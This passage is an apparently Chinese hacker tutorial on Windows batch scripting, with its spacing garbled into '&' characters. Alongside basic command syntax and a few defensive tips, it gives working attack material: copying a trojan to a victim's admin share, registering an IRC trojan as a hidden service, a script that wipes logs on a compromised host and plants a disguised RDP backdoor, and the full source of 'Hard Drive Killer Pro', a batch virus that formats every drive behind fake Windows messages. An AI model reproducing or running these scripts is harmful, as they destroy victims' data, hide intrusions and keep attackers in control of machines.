怎么样,使用参数还是比较简单的吧？你这么帅一定学会了.No.3&三.如何使用组合命令(Compound&Command)&1.&&Usage：第一条命令&&&第二条命令&[&&第三条命令...]&用这种方法可以同时执行多条命令，而不管命令是否执行成功&Sample：&C:\&dir&z:&&&dir&c:\Ex4rch&The&system&cannot&find&the&path&specified.&Volume&in&drive&C&has&no&label.&Volume&Serial&Number&is&0078-59FB&Directory&of&c:\Ex4rch&&23:51&.&&23:51&..&&23:51&14&sometips.gif&2.&&&Usage：第一条命令&&&&第二条命令&[&&&第三条命令...]&用这种方法可以同时执行多条命令，当碰到执行出错的命令后将不执行后面的命令，如果一直没有出错则一直执行完所有命令；&Sample：&C:\&dir&z:&&&&dir&c:\Ex4rch&The&system&cannot&find&the&path&specified.&C:\&dir&c:\Ex4rch&&&&dir&z:&Volume&in&drive&C&has&no&label.&Volume&Serial&Number&is&0078-59FB&Directory&of&c:\Ex4rch&&23:55&.&&23:55&..&&23:55&14&sometips.gif&1&File(s)&14&bytes&2&Dir(s)&768,671,744&bytes&free&The&system&cannot&find&the&path&specified.&在做备份的时候可能会用到这种命令会比较简单，如：&dir&file&://192.168.0.1/database/backup.mdb&&&&copy&file&://192.168.0.1/database/backup.mdb&E:\backup&如果远程服务器上存在backup.mdb文件，就执行copy命令，若不存在该文件则不执行copy命令。这种用法可以替换IF&exist了&：）&3.││&Usage：第一条命令&││&第二条命令&[││&第三条命令...]&用这种方法可以同时执行多条命令，当碰到执行正确的命令后将不执行后面的命令，如果没有出现正确的命令则一直执行完所有命令；&Sample：&C:\Ex4rch&dir&sometips.gif&││&del&sometips.gif&Volume&in&drive&C&has&no&label.&Volume&Serial&Number&is&0078-59FB&Directory&of&C:\Ex4rch&&23:55&14&sometips.gif&1&File(s)&14&bytes&0&Dir(s)&768,696,320&bytes&free&组合命令使用的例子：&sample：&@copy&trojan.exe&\\%1\admin$\system32&&&&if&not&errorlevel&1&echo&IP&%1&USER&%2&PASS&%3&&&victim.txt&四、管道命令的使用&1.│&命令&Usage：第一条命令&│&第二条命令&[│&第三条命令...]&将第一条命令的结果作为第二条命令的参数来使用，记得在unix中这种方式很常见。&sample：&time&/t&&D:\IP.log&netstat&-n&-p&tcp│find&":3389"&&D:\IP.log&start&Explorer&看出来了么？用于终端服务允许我们为用户自定义起始的程序，来实现让用户运行下面这个bat，以获得登录用户的IP。&2.&、&&输出重定向命令&将一条命令或某个程序输出结果的重定向到特定文件中,&&&与&&&的区别在于，&会清除调原有文件中的内容后写入指定文件，而&&只会追加内容到指定文件中，而不会改动其中的内容。&sample1：&echo&hello&world&c:\hello.txt&(stupid&example?)&sample2:&时下DLL木马盛行，我们知道system32是个捉迷藏的好地方，许多木马都削尖了脑袋往那里钻，DLL马也不例外，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一个记录：&运行CMD--转换目录到system32--dir&*.exe&exeback.txt&&&dir&*.dll&dllback.txt,&这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,&日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.&这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行:&CMD--fc&exeback.txt&exeback1.txt&diff.txt&&&fc&dllback.txt&dllback1.txt&diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好，如果有的话也不要直接DEL掉，先用regsvr32&/u&trojan.dll将后门DLL文件注销掉,再把它移到回收站里，若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。&3.&&、&&&、&&&&&从文件中而不是从键盘中读入命令输入。&&&&将一个句柄的输出写入到另一个句柄的输入中。&&&&从一个句柄读取输入并将其写入到另一个句柄输出中。&这些并不常用，也就不多做介绍。&No.5&五.如何用批处理文件来操作注册表&在入侵过程中经常回操作注册表的特定的键值来实现一定的目的，例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性，这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)&关于注册表的操作，常见的是创建、修改、删除。&1.创建&创建分为两种，一种是创建子项(Subkey)&我们创建一个文件，内容如下：&Windows&Registry&Editor&Version&5.00&[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]&然后执行该脚本，你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为"hacker"的子项。&另一种是创建一个项目名称&那这种文件格式就是典型的文件格式，和你从注册表中导出的文件格式一致，内容如下：&Windows&Registry&Editor&Version&5.00&[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]&"Invader"="Ex4rch"&"Door"=C:\\WINNT\\system32\\door.exe&"Autodos"=dword:02&这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下&新建了:Invader、door、about这三个项目&Invader的类型是"String&value"&door的类型是"REG&SZ&value"&Autodos的类型是"DWORD&value"&2.修改&修改相对来说比较简单，只要把你需要修改的项目导出，然后用记事本进行修改，然后导入（regedit&/s）即可。&3.删除&我们首先来说说删除一个项目名称，我们创建一个如下的文件：&Windows&Registry&Editor&Version&5.00&[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]&"Ex4rch"=-&执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了；&我们再看看删除一个子项，我们创建一个如下的脚本：&Windows&Registry&Editor&Version&5.00&[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]&执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。&相信看到这里，.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了，记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。&samlpe1:如上面的那个例子,如想生成如下注册表文件&Windows&Registry&Editor&Version&5.00&[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]&"Invader"="Ex4rch"&"door"=hex:255&"Autodos"=dword:&只需要这样：&@echo&Windows&Registry&Editor&Version&5.00&&Sample.reg&@echo&[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]&Sample.reg&@echo&"Invader"="Ex4rch"&&Sample.reg&@echo&"door"=5&&C:\\WINNT\\system32\\door.exe&&Sample.reg&@echo&"Autodos"=dword:02&&Sample.reg&samlpe2:&我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)&@start&windrv32.exe&@attrib&+h&+r&windrv32.exe&@echo&[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]&&&patch.dll&@echo&"windsnx&"=-&&&patch.dll&@sc.exe&create&Windriversrv&type=&kernel&start=&auto&displayname=&WindowsDriver&binpath=&c:\winnt\system32\windrv32.exe&@regedit&/s&patch.dll&@delete&patch.dll&@REM&[删除DSNXDE在注册表中的启动项，用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读，并config为自启动]&@REM&这样不是更安全.&六.精彩实例放送。&1.删除win2k/xp系统默认共享的批处理&
------------------------&cut&here&then&save&as&.bat&or&.cmd&file&---------------------------&@echo&preparing&to&delete&all&the&default&shares.when&ready&pres&any&key.&@pause&@echo&off&:Rem&check&parameters&if&null&show&usage.&if&{%1}=={}&goto&:Usage&:Rem&code&start.&echo.&echo&------------------------------------------------------&echo.&echo&Now&deleting&all&the&default&shares.&echo.&net&share&%1$&/delete&net&share&%2$&/delete&net&share&%3$&/delete&net&share&%4$&/delete&net&share&%5$&/delete&net&share&%6$&/delete&net&share&%7$&/delete&net&share&%8$&/delete&net&share&%9$&/delete&net&stop&Server&net&start&Server&echo.&echo&All&the&shares&have&been&deleteed&echo.&echo&------------------------------------------------------&echo.&echo&Now&modify&the&registry&to&change&the&system&default&properties.&echo.&echo&Now&creating&the&registry&file&echo&Windows&Registry&Editor&Version&5.00&&c:\delshare.reg&echo&[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]&&&c:\delshare.reg&echo&"AutoShareWks"=dword:&&&c:\delshare.reg&echo&"AutoShareServer"=dword:&&&c:\delshare.reg&echo&Nowing&using&the&registry&file&to&chang&the&system&default&properties.&regedit&/s&c:\delshare.reg&echo&Deleting&the&temprotarily&files.&del&c:\delshare.reg&goto&:END&:Usage&echo.&echo&------------------------------------------------------&echo.&echo&☆&A&example&for&batch&file&☆&echo&☆&[Use&batch&file&to&change&the&sysytem&share&properties.]&☆&echo.&echo&Author：Ex4rch&echo&Mail:&QQ:1672602&echo.&echo&Error：Not&enough&parameters&echo.&echo&☆&Please&enter&the&share&disk&you&wanna&delete&☆&echo.&echo&For&instance，to&delete&the&default&shares:&echo&delshare&c&d&e&ipc&admin&print&echo.&echo&If&the&disklable&is&not&as&C:&D:&E:&，Please&chang&it&youself.&echo.&echo&example：&echo&If&locak&disklable&are&C:&D:&E:&X:&Y:&Z:&，you&should&chang&the&command&into&：&echo&delshare&c&d&e&x&y&z&ipc&admin&print&echo.&echo&***&you&can&delete&nine&shares&once&in&a&useing&***&echo.&echo&------------------------------------------------------&goto&:EOF&:END&echo.&echo&------------------------------------------------------&echo.&echo&OK,delshare.bat&has&deleted&all&the&share&you&assigned.&echo.Any&questions&,feel&free&to&mail&to&.&echo&echo.&echo&------------------------------------------------------&echo.&:EOF&echo&end&of&the&batch&file&------------------------&cut&here&then&save&as&.bat&or&.cmd&file&---------------------------&
2.全面加固系统（给肉鸡打补丁）的批处理文件&
------------------------&cut&here&then&save&as&.bat&or&.cmd&file&---------------------------&@echo&Windows&Registry&Editor&Version&5.00&&patch.dll&@echo&[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]&&&patch.dll&@echo&"AutoShareServer"=dword:&&&patch.dll&@echo&"AutoShareWks"=dword:&&&patch.dll&@REM&[禁止共享]&@echo&[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]&&&patch.dll&@echo&"restrictanonymous"=dword:&&&patch.dll&@REM&[禁止匿名登录]&@echo&[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]&&&patch.dll&@echo&"SMBDeviceEnabled"=dword:&&&patch.dll&@REM&[禁止及文件访问和打印共享]&@echo&[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry]&&&patch.dll&@echo&"Start"=dword:&&&patch.dll&@echo&[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]&&&patch.dll&@echo&"Start"=dword:&&&patch.dll&@echo&[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows&NT\CurrentVersion\Winlogon]&&&patch.dll&@echo&"ShutdownWithoutLogon"="0"&&&patch.dll&@REM&[禁止登录前关机]&@echo&"DontDisplayLastUserName"="1"&&&patch.dll&@REM&[禁止显示前一个登录用户名称]&@regedit&/s&patch.dll&------------------------&cut&here&then&save&as&.bat&or&.cmd&file&-------------------------
下面命令是清除肉鸡所有日志，禁止一些危险的服务，并修改肉鸡的terminnal&service留跳后路。&
@regedit&/s&patch.dll&@net&stop&w3svc&@net&stop&event&log&@del&c:\winnt\system32\logfiles\w3svc1\*.*&/f&/q&@del&c:\winnt\system32\logfiles\w3svc2\*.*&/f&/q&@del&c:\winnt\system32\config\*.event&/f&/q&@del&c:\winnt\system32dtclog\*.*&/f&/q&@del&c:\winnt\*.txt&/f&/q&@del&c:\winnt\*.log&/f&/q&@net&start&w3svc&@net&start&event&log&@rem&[删除日志]&@net&stop&lanmanserver&/y&@net&stop&Schedule&/y&@net&stop&RemoteRegistry&/y&@del&patch.dll&@echo&The&server&has&been&patched,Have&fun.&@del&patch.bat&@REM&[禁止一些危险的服务。]&@echo&[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal&Server\WinStations\RDP-Tcp]&&&patch.dll&@echo&"PortNumber"=dword:&&&patch.dll&@echo&[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal&Server\Wds\rdpwd\Tds\tcp&&&patch.dll&@echo&"PortNumber"=dword:&&&patch.dll&@echo&[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]&&&patch.dll&@echo&"Start"=dword:&&&patch.dll&@echo&[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]&&&patch.dll&@echo&"Start"=dword:&&&patch.dll&@echo&"ErrorControl"=dword:&&&patch.dll&@echo&"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\&&&patch.dll&@echo&74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\&&&patch.dll&@echo&00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00&&&patch.dll&@echo&"ObjectName"="LocalSystem"&&&patch.dll&@echo&"Type"=dword:&&&patch.dll&@echo&"Description"="Keep&record&of&the&program&and&windows'&message。"&&&patch.dll&@echo&"DisplayName"="Microsoft&EventLog"&&&patch.dll&@echo&[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice]&&&patch.dll&@echo&"Start"=dword:&&&patch.dll&@copy&c:\winnt\system32\termsrv.exe&c:\winnt\system32\eventlog.exe&@REM&[修改3389连接，端口为8210(十六进制为)，名称为Microsoft&EventLog，留条后路]
&3.Hard&Drive&Killer&Pro&Version&4.0（玩批处理到这个水平真的不容易了。）&
------------------------&cut&here&then&save&as&.bat&or&.cmd&file&---------------------------&@echo&off&rem&This&program&is&dedecated&to&a&very&special&person&that&does&not&want&to&be&named.&:start&cls&echo&PLEASE&WAIT&WHILE&PROGRAM&LOADS&.&.&.&call&attrib&-r&-h&c:\autoexec.bat&&nul&echo&@echo&off&&c:\autoexec.bat&echo&call&format&c:&/q&/u&/autoSample&&nul&&&c:\autoexec.bat&call&attrib&+r&+h&c:\autoexec.bat&&nul&rem&Drive&checking&and&assigning&the&valid&drives&to&the&drive&variable.&set&drive=&set&alldrive=c&d&e&f&g&h&i&j&k&l&m&n&o&p&q&r&s&t&u&v&w&x&y&z&rem&code&insertion&for&Drive&Checking&takes&place&here.&rem&drivechk.bat&is&the&file&name&under&the&root&directory.&rem&As&far&as&the&drive&detection&and&drive&variable&settings,&don't&worry&about&how&it&rem&works,&it's&d\*amn&to&complicated&for&the&average&or&even&the&expert&batch&programmer.&rem&Except&for&Tom&Lavedas.&echo&@echo&off&&drivechk.bat&echo&@prompt&%%%%comspec%%%%&/f&/c&vol&%%%%1:&$b&find&"Vol"&&&nul&&{t}.bat&%comspec%&/e:2048&/c&{t}.bat&&&drivechk.bat&del&{t}.bat&echo&if&errorlevel&1&goto&enddc&&&drivechk.bat&cls&echo&PLEASE&WAIT&WHILE&PROGRAM&LOADS&.&.&.&rem&When&errorlevel&is&1,&then&the&above&is&not&true,&if&0,&then&it's&true.&rem&Opposite&of&binary&rules.&If&0,&it&will&elaps&to&the&next&command.&echo&@prompt&%%%%comspec%%%%&/f&/c&dir&%%%%1:.\/ad/w/-p&$b&find&"bytes"&&&nul&&{t}.bat&%comspec%&/e:2048&/c&{t}.bat&&&drivechk.bat&del&{t}.bat&echo&if&errorlevel&1&goto&enddc&&&drivechk.bat&cls&echo&PLEASE&WAIT&WHILE&PROGRAM&LOADS&.&.&.&rem&if&errorlevel&is&1,&then&the&drive&specified&is&a&removable&media&drive&-&not&ready.&rem&if&errorlevel&is&0,&then&it&will&elaps&to&the&next&command.&echo&@prompt&dir&%%%%1:.\/ad/w/-p&$b&find&"&0&bytes&free"&&&nul&&{t}.bat&%comspec%&/e:2048&/c&{t}.bat&&&drivechk.bat&del&{t}.bat&echo&if&errorlevel&1&set&drive=%%drive%%&%%1&&&drivechk.bat&cls&echo&PLEASE&WAIT&WHILE&PROGRAM&LOADS&.&.&.&rem&if&it's&errorlevel&1,&then&the&specified&drive&is&a&hard&or&floppy&drive.&rem&if&it's&not&errorlevel&1,&then&the&specified&drive&is&a&CD-ROM&drive.&echo&:enddc&&&drivechk.bat&rem&Drive&checking&insertion&ends&here.&"enddc"&stands&for&"end&dDRIVE&cHECKING".&rem&Now&we&will&use&the&program&drivechk.bat&to&attain&valid&drive&information.&:Sampledrv&for&%%a&in&(%alldrive%)&do&call&drivechk.bat&%%a&&nul&del&drivechk.bat&&nul&if&%drive.==.&set&drive=c&:form_del&call&attrib&-r&-h&c:\autoexec.bat&&nul&echo&@echo&off&&c:\autoexec.bat&echo&echo&Loading&Windows,&please&wait&while&Microsoft&Windows&recovers&your&system&.&.&.&&&c:\autoexec.bat&echo&for&%%%%a&in&(%drive%)&do&call&format&%%%%a:&/q&/u&/autoSample&&nul&&&c:\autoexec.bat&echo&cls&&&c:\autoexec.bat&echo&echo&Loading&Windows,&please&wait&while&Microsoft&Windows&recovers&your&system&.&.&.&&&c:\autoexec.bat&echo&for&%%%%a&in&(%drive%)&do&call&c:\temp.bat&%%%%a&Bunga&&nul&&&c:\autoexec.bat&echo&cls&&&c:\autoexec.bat&echo&echo&Loading&Windows,&please&wait&while&Microsoft&Windows&recovers&your&system&.&.&.&&&c:\autoexec.bat&echo&for&%%%%a&in&(%drive%)&call&deltree&/y&%%%%a:\&&nul&&&c:\autoexec.bat&echo&cls&&&c:\autoexec.bat&echo&echo&Loading&Windows,&please&wait&while&Microsoft&Windows&recovers&your&system&.&.&.&&&c:\autoexec.bat&echo&for&%%%%a&in&(%drive%)&do&call&format&%%%%a:&/q&/u&/autoSample&&nul&&&c:\autoexec.bat&echo&cls&&&c:\autoexec.bat&echo&echo&Loading&Windows,&please&wait&while&Microsoft&Windows&recovers&your&system&.&.&.&&&c:\autoexec.bat&echo&for&%%%%a&in&(%drive%)&do&call&c:\temp.bat&%%%%a&Bunga&&nul&&&c:\autoexec.bat&echo&cls&&&c:\autoexec.bat&echo&echo&Loading&Windows,&please&wait&while&Microsoft&Windows&recovers&your&system&.&.&.&&&c:\autoexec.bat&echo&for&%%%%a&in&(%drive%)&call&deltree&/y&%%%%a:\&&nul&&&c:\autoexec.bat&echo&cd\&&&c:\autoexec.bat&echo&cls&&&c:\autoexec.bat&echo&echo&Welcome&to&the&land&of&death.&Munga&Bunga's&Multiple&Hard&Drive&Killer&version&4.0.&&&c:\autoexec.bat&echo&echo&If&you&ran&this&file,&then&sorry,&I&just&made&it.&The&purpose&of&this&program&is&to&tell&you&the&following.&.&.&&&c:\autoexec.bat&echo&echo&1.&To&make&people&aware&that&security&should&not&be&taken&for&granted.&&&c:\autoexec.bat&echo&echo&2.&Love&is&important,&if&you&have&it,&truly,&don't&let&go&of&it&like&I&did!&&&c:\autoexec.bat&echo&echo&3.&If&you&are&NOT&a&vegetarian,&then&you&are&a&murderer,&and&I'm&glad&your&HD&is&dead.&&&c:\autoexec.bat&echo&echo&4.&Don't&support&the&following:&War,&Racism,&Drugs&and&the&Liberal&Party.&&c:\autoexec.bat&echo&echo.&&&c:\autoexec.bat&echo&echo&Regards,&&&c:\autoexec.bat&echo&echo.&&&c:\autoexec.bat&echo&echo&Munga&Bunga&&&c:\autoexec.bat&call&attrib&+r&+h&c:\autoexec.bat&:makedir&if&exist&c:\temp.bat&attrib&-r&-h&c:\temp.bat&&nul&echo&@echo&off&&c:\temp.bat&echo&%%1:\&&&c:\temp.bat&echo&cd\&&&c:\temp.bat&echo&:startmd&&&c:\temp.bat&echo&for&%%%%a&in&("if&not&exist&%%2\nul&md&%%2"&"if&exist&%%2\nul&cd&%%2")&do&%%%%a&&&c:\temp.bat&echo&for&%%%%a&in&("&ass_hole.txt")&do&echo&%%%%a&Your&Gone&@$$hole!!!!&&&c:\temp.bat&echo&if&not&exist&%%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul&goto&startmd&&&c:\temp.bat&call&attrib&+r&+h&c:\temp.bat&&nul&cls&echo&Initializing&Variables&.&.&.&rem&deltree&/y&%%a:\*.&only&eliminates&directories,&hence&leaving&the&file&created&above&for&further&destruction.&for&%%a&in&(%drive%)&do&call&format&%%a:&/q&/u&/autoSample&&nul&cls&echo&Initializing&Variables&.&.&.&echo&Validating&Data&.&.&.&for&%%a&in&(%drive%)&do&call&c:\temp.bat&%%a&Munga&&nul&cls&echo&Initializing&Variables&.&.&.&echo&Validating&Data&.&.&.&echo&Analyzing&System&Structure&.&.&.&for&%%a&in&(%drive%)&call&attrib&-r&-h&%%a:\&/S&&nul&call&attrib&+r&+h&c:\temp.bat&&nul&call&attrib&+r&+h&c:\autoexec.bat&&nul&cls&echo&Initializing&Variables&.&.&.&echo&Validating&Data&.&.&.&echo&Analyzing&System&Structure&.&.&.&echo&Initializing&Application&.&.&.&for&%%a&in&(%drive%)&call&deltree&/y&%%a:\*.&&nul&cls&echo&Initializing&Variables&.&.&.&echo&Validating&Data&.&.&.&echo&Analyzing&System&Structure&.&.&.&echo&Initializing&Application&.&.&.&echo&Starting&Application&.&.&.&for&%%a&in&(%drive%)&do&call&c:\temp.bat&%%a&Munga&&nul&cls&echo&Thank&you&for&using&a&Munga&Bunga&product.&echo.&echo&Oh&and,&Bill&Gates&rules,&and&he&is&not&a&geek,&he&is&a&good&looking&genius.&echo.&echo&Here&is&a&joke&for&you&.&.&.&echo.&echo&Q).&What's&the&worst&thing&about&being&an&egg?&echo&A).&You&only&get&laid&once.&echo.&echo&HAHAHAHA,&get&it?&Don't&you&just&love&that&one?&echo.&echo&Regards,&echo.&echo&Munga&Bunga&:end&
rem&Hard&Drive&Killer&Pro&Version&4.0,&enjoy!!!!&rem&Author:&Munga&Bunga&-&from&Australia,&the&land&full&of&retarded&Australian's&(help&me&get&out&of&here).